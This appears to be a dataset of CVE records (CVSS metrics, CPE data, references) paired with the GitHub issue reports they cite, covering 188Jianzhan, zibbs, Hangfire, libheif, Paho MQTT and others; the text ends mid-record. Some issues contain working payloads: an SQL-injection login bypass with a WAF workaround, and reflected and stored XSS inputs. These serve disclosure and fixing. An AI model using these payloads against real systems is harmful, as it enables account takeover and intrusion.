https://github.com/abhijitnathwani/image-processing/issues/3
541,630,239
3
2,744
CVE-2020-23685
2021-11-02T18:15:08.163
SQL Injection vulnerability in 188Jianzhan v2.1.0, allows attackers to execute arbitrary code and gain escalated privileges, via the username parameter to login.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vtime-tech/188Jianzhan/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vtime-tech/188Jianzhan/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vtimecn:188jianzhan:2.10:*:*:*:*:*:*:*", "matchCriteriaId": "8A9E7BC5-8E4B-4871-99F4-43C315F868B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/vtime-tech/188Jianzhan/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "vtime-tech", "188Jianzhan" ]
There is SQL injection vulnerability in the login office of 188Jianzhan, which can bypass WAF and direct universal password without the need to verify the login background. ![QQ截图20200621092050](https://user-images.githubusercontent.com/61683660/85221053-50a28e00-b3e3-11ea-9ab4-acee894a6319.png) At line 29, querying $user and $PWD using the SELECT statement does not do any effective filtering. So there is an SQL injection vulnerability and you can log in directly with the universal password `admin' and 1=1#` But first, we need to bypass WAF.There's a 360waf protection. ![QQ截图20200621092112](https://user-images.githubusercontent.com/61683660/85221130-fce47480-b3e3-11ea-9904-76f0861390f8.png) We can use` like `instead of `=` In the end,The payload :`admin' or 1 like 1#`,Then enter any password。 ![QQ截图20200621093307](https://user-images.githubusercontent.com/61683660/85221169-4a60e180-b3e4-11ea-98f5-2037abac5096.png)
118jianzhan v2.10 /Admin/login.php sql injection vulnerability
https://api.github.com/repos/vtime-tech/188Jianzhan/issues/2/comments
1
2020-06-21T09:29:24Z
2021-08-18T14:53:42Z
https://github.com/vtime-tech/188Jianzhan/issues/2
642,528,756
2
2,745
CVE-2020-23718
2021-11-02T18:15:08.247
Cross site scripting (XSS) vulnerability in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the route parameter to index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xujinliang/zibbs/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xujinliang/zibbs/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zibbs_project:zibbs:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8C00A530-FD11-4C90-A706-14BE8213C7F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xujinliang/zibbs/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xujinliang", "zibbs" ]
First follow to the index.php entry file, which will load the frame file directly, so just visit the following address `http://20.20.20.130:8000/zibbs/index.php` `http://20.20.20.130:8000/zibbs` Will directly load the framework file and instantiate the framework class ![图片](https://user-images.githubusercontent.com/33337704/84992814-fb644380-b17a-11ea-8d72-6bb437d2dc13.png) Directly trace to the **core/framework.php** file. After analysis, this CMS handles the processing of each controller and operation through 【route】, wherein the parameter route is the controller name and action name to be filled in in this GET request. **core/framework.php** ![图片](https://user-images.githubusercontent.com/33337704/84992835-04551500-b17b-11ea-9c12-aa05f81e02d4.png) A normal GET request would look like this http://20.20.20.130:8000/zibbs/index.php?route=admin/login ![图片](https://user-images.githubusercontent.com/33337704/84992855-0b7c2300-b17b-11ea-9ba2-89df40f273cb.png) And here the parameter 【route】 is controllable, The value of the input parameter 【route】 is processed as follows, The value of the parameter【router】is first split through /,Such as route=aaa/bbb, the aaa Is the controller name,bbb for the action of, It also makes conditional judgments about whether the controller and the action name exist, When the Controller name does not exist, it will directly output "aaa Controller Controller does not exist 11111", as shown below ![图片](https://user-images.githubusercontent.com/33337704/84992877-15058b00-b17b-11ea-9ef9-86124271d9c9.png) ![图片](https://user-images.githubusercontent.com/33337704/84992891-1a62d580-b17b-11ea-8bfa-33a03ba10d33.png) This is for the parameter 【route】, If the controller doesn't exist, The value of the input parameter 【route】 is displayed directly, And the following values, without XSS filtering, Only the addslashes() method is done here, and there is no XSS filtering function in this aspect ![图片](https://user-images.githubusercontent.com/33337704/84992914-22bb1080-b17b-11ea-8d96-2471522cfffe.png) Because there is no filtering here, there is reflective XSS, which is tested as follows Because of the split for / here, the regular XSS payload cannot be taken from a bomb frame, so using the following XSS payload can make a bomb fram <img src=x onerror=prompt(1)> http://20.20.20.130:8000/zibbs/index.php?route=1111%3Cimg%20src=x%20onerror=prompt(1)%3E ![图片](https://user-images.githubusercontent.com/33337704/84992939-2d75a580-b17b-11ea-8d5d-ff7da9d85105.png) ![图片](https://user-images.githubusercontent.com/33337704/84992990-36ff0d80-b17b-11ea-8d6b-c415a049f421.png) The following test statement can also cause a pop-up as normal route=admin/<img src=x onerror=prompt(1)> ![图片](https://user-images.githubusercontent.com/33337704/84993014-41b9a280-b17b-11ea-93e8-d850888b600a.png) **Solution:** filter or encode special characters like this < > " ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...
The function parameter [Route] has reflective XSS
https://api.github.com/repos/xujinliang/zibbs/issues/4/comments
1
2020-06-18T07:51:59Z
2020-06-18T08:07:08Z
https://github.com/xujinliang/zibbs/issues/4
640,989,968
4
2,746
CVE-2020-23719
2021-11-02T18:15:08.287
Cross site scripting (XSS) vulnerability in application/controllers/AdminController.php in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the bbsmeta parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xujinliang/zibbs/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xujinliang/zibbs/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zibbs_project:zibbs:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8C00A530-FD11-4C90-A706-14BE8213C7F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xujinliang/zibbs/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xujinliang", "zibbs" ]
First log in to the background and go to the background Settings,(Compare the storage XSS vulnerabilities of chicken ribs) ![image](https://user-images.githubusercontent.com/33337704/85356451-91181e00-b541-11ea-9c74-b581456d601f.png) Description here(HTML syntax support),Guess there is an XSS vulnerability,Get the parameter 【bbsmeta】here by grabbing the bag,Trace in the source code **application/controllers/AdminController.php code** ![image](https://user-images.githubusercontent.com/33337704/85356493-a8570b80-b541-11ea-864b-8b555eaf9a01.png) This was filtered by addslashes() and htmlspecialchar () Obviously when you insert the data into the database you will have a layer of filtering, and then you will continue to track the specific page output location of this parameter to the following **application/views/index/index.php code** ![image](https://user-images.githubusercontent.com/33337704/85356505-b0af4680-b541-11ea-8099-818c9020075b.png) When the page is output here, the following function is made for the parameter 【bbsmeta】to handle htmlspecialchars_decode The storage XSS here results in the storage XSS due to the use ofhtmlspecialchars_decode() function, So through the black box to verify Insert the following test statement in the background and click Update **payload:** <script>alert(/xss/)</script> ![image](https://user-images.githubusercontent.com/33337704/85356518-b86eeb00-b541-11ea-8100-a4ecc6f76edf.png) The XSS is then accessed directly to the foreground and executed successfully `**http://20.20.20.129:8000/zibbs/index.php**` ![image](https://user-images.githubusercontent.com/33337704/85356528-c0c72600-b541-11ea-91ad-52f089ed9f5d.png) ![image](https://user-images.githubusercontent.com/33337704/85356535-c4f34380-b541-11ea-8174-343c1da860be.png) **Solution:** filter or encode special characters like this < > " ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...
Background setting function parameter【bbsmeta】Storage XSS vulnerabilities
https://api.github.com/repos/xujinliang/zibbs/issues/5/comments
4
2020-06-23T03:15:15Z
2020-06-23T03:37:38Z
https://github.com/xujinliang/zibbs/issues/5
643,496,532
5
2,747
CVE-2021-41238
2021-11-02T18:15:08.777
Hangfire is an open source system to perform background job processing in a .NET or .NET Core applications. No Windows Service or separate process required. Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization filters specified, `LocalRequestsOnlyAuthorizationFilter` filter is being used to allow only local requests and prohibit all the remote requests to provide sensible, protected by default settings. However due to the recent changes, in version 1.7.25 no authorization filters are used by default, allowing remote requests to succeed. If you are using `UseHangfireDashboard` method with default `DashboardOptions.Authorization` property value, then your installation is impacted. If any other authorization filter is specified in the `DashboardOptions.Authorization` property, the you are not impacted. Patched versions (1.7.26) are available both on Nuget.org and as a tagged release on the github repo. Default authorization rules now prohibit remote requests by default again by including the `LocalRequestsOnlyAuthorizationFilter` filter to the default settings. Please upgrade to the newest version in order to mitigate the issue. For users who are unable to upgrade it is possible to mitigate the issue by using the `LocalRequestsOnlyAuthorizationFilter` explicitly when configuring the Dashboard UI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/HangfireIO/Hangfire/issues/1958" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/HangfireIO/Hangfire/issues/1958" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hangfire:hangfire:1.7.25:*:*:*:*:*:*:*", "matchCriteriaId": "B0C79641-C046-4220-BC96-640A6D4D9E42", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/HangfireIO/Hangfire/issues/1958
[ "Third Party Advisory" ]
github.com
[ "HangfireIO", "Hangfire" ]
When using Dashboard version 1.7.24, the dashboard is not accessible from outside of the server (401). As of version 1.7.25, it is accessible from outside of the server by default. I have no authorization configured, so by default it should not allow access from outside of the server.
Dashboard accessible from outside by default (since 1.7.25)
https://api.github.com/repos/HangfireIO/Hangfire/issues/1958/comments
3
2021-10-26T10:28:25Z
2021-10-27T16:17:45Z
https://github.com/HangfireIO/Hangfire/issues/1958
1,036,117,302
1,958
2,749
CVE-2021-41036
2021-11-03T00:15:08.023
In versions prior to 1.1 of the Eclipse Paho MQTT C Client, the client does not check rem_len size in readpacket.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "emo@eclipse.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:paho_mqtt_c\\/c\\+\\+_client:*:*:*:*:*:*:*:*", "matchCriteriaId": "D118B76A-6E83-4AB0-9701-6248169CB482", "versionEndExcluding": "1.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/eclipse/paho.mqtt.embedded-c/issues/96
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "eclipse", "paho.mqtt.embedded-c" ]
in readPacket function, should check rem_len with readbuf_size between step 2 and step 3.
should check rem_len size in readpacket.
https://api.github.com/repos/eclipse-paho/paho.mqtt.embedded-c/issues/96/comments
3
2017-06-21T06:12:07Z
2021-11-02T23:18:06Z
https://github.com/eclipse-paho/paho.mqtt.embedded-c/issues/96
237,425,026
96
2,750
CVE-2020-23109
2021-11-03T17:15:08.027
Buffer overflow vulnerability in function convert_colorspace in heif_colorconversion.cc in libheif v1.6.2, allows attackers to cause a denial of service and disclose sensitive information, via a crafted HEIF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/issues/207" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/issues/207" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libheif:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "70C2B8C8-0EE3-4AAF-8584-F639A0428F03", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/strukturag/libheif/issues/207
[ "Exploit", "Third Party Advisory" ]
github.com
[ "strukturag", "libheif" ]
I spotted this overflow in `heif_colorconversion.cc`. ##### how to reproduce: ```./heif-convert heap-overflow.poc test.png``` [heap-overflow.poc.zip](https://github.com/strukturag/libheif/files/4242885/heap-overflow.poc.zip) Here is the report of ASAN ``` ==19327==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62300000350e at pc 0x0000007cf8f3 bp 0x7ffd1d38dbd0 sp 0x7ffd1d38dbc8 READ of size 2 at 0x62300000350e thread T0 #0 0x7cf8f2 in Op_YCbCr420_to_RRGGBBaa::convert_colorspace(std::shared_ptr<heif::HeifPixelImage const> const&, heif::ColorState, heif::ColorConversionOptions) libheif/heif_colorconversion.cc:2263:58 #1 0x7fd4d8 in heif::ColorConversionPipeline::convert_image(std::shared_ptr<heif::HeifPixelImage> const&) libheif/heif_colorconversion.cc:2446:15 #2 0x781134 in heif::convert_colorspace(std::shared_ptr<heif::HeifPixelImage> const&, heif_colorspace, heif_chroma) libheif/heif_image.cc:396:19 #3 0x5d4e46 in heif::HeifContext::Image::decode_image(std::shared_ptr<heif::HeifPixelImage>&, heif_colorspace, heif_chroma, heif_decoding_options const*) const libheif/heif_context.cc:896:11 #4 0x549151 in heif_decode_image libheif/heif.cc:660:33 #5 0x522111 in main examples/heif_convert.cc:226:11 #6 0x7f3e8328182f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41e308 in _start (examples/heif-convert+0x41e308) 0x62300000350f is located 0 bytes to the right of 6159-byte region [0x623000001d00,0x62300000350f) allocated by thread T0 here: #0 0x51a178 in operator new[](unsigned long) (examples/heif-convert+0x51a178) #1 0x77b052 in heif::HeifPixelImage::add_plane(heif_channel, int, int, int) libheif/heif_image.cc:151:27 SUMMARY: AddressSanitizer: heap-buffer-overflow libheif/heif_colorconversion.cc:2263:58 in Op_YCbCr420_to_RRGGBBaa::convert_colorspace(std::shared_ptr<heif::HeifPixelImage const> const&, heif::ColorState, heif::ColorConversionOptions) Shadow bytes around the buggy address: 0x0c467fff8650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c467fff8660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c467fff8670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c467fff8680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c467fff8690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c467fff86a0: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c467fff86b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c467fff86c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c467fff86d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c467fff86e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c467fff86f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==19327==ABORTING ```
Heap overflow in heif_colorconversion.cc:2263
https://api.github.com/repos/strukturag/libheif/issues/207/comments
9
2020-02-24T02:04:49Z
2025-03-02T17:19:39Z
https://github.com/strukturag/libheif/issues/207
569,601,645
207
2,751
CVE-2020-23679
2021-11-03T17:15:08.117
Buffer overflow vulnerability in Renleilei1992 Linux_Network_Project 1.0, allows attackers to execute arbitrary code, via the password field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Renleilei1992/Linux_Network_Project/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Renleilei1992/Linux_Network_Project/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linux_network_project:linux_network_project:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A7DA1B65-B95B-4EDC-A1E7-5D6D9673EA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/Renleilei1992/Linux_Network_Project/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Renleilei1992", "Linux_Network_Project" ]
客户端注册用户,输入新密码,未对密码的长度进行校验,存在栈溢出漏洞 ![image](https://user-images.githubusercontent.com/54881286/85050084-25902280-b1c8-11ea-97b4-c966b539ff07.png)
client 注册用户信息,存在栈溢出漏洞
https://api.github.com/repos/Renleilei1992/Linux_Network_Project/issues/1/comments
0
2020-06-18T17:00:10Z
2020-06-18T17:00:10Z
https://github.com/Renleilei1992/Linux_Network_Project/issues/1
641,396,611
1
2,752
CVE-2021-27836
2021-11-03T17:15:08.337
An issue was discoverered in in function xls_getWorkSheet in xls.c in libxls 1.6.2, allows attackers to cause a denial of service, via a crafted XLS file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libxls/libxls/issues/94" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5D7XXCVFYRRMI4ENXYSD3MZEBS6SMI7E/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFOE4Z6T46LA47VXWUVET4ELXRZQ3BWB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y6XOTFEOCHYKZAFCB6H3KNIIFJ3UFV7V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libxls/libxls/issues/94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": 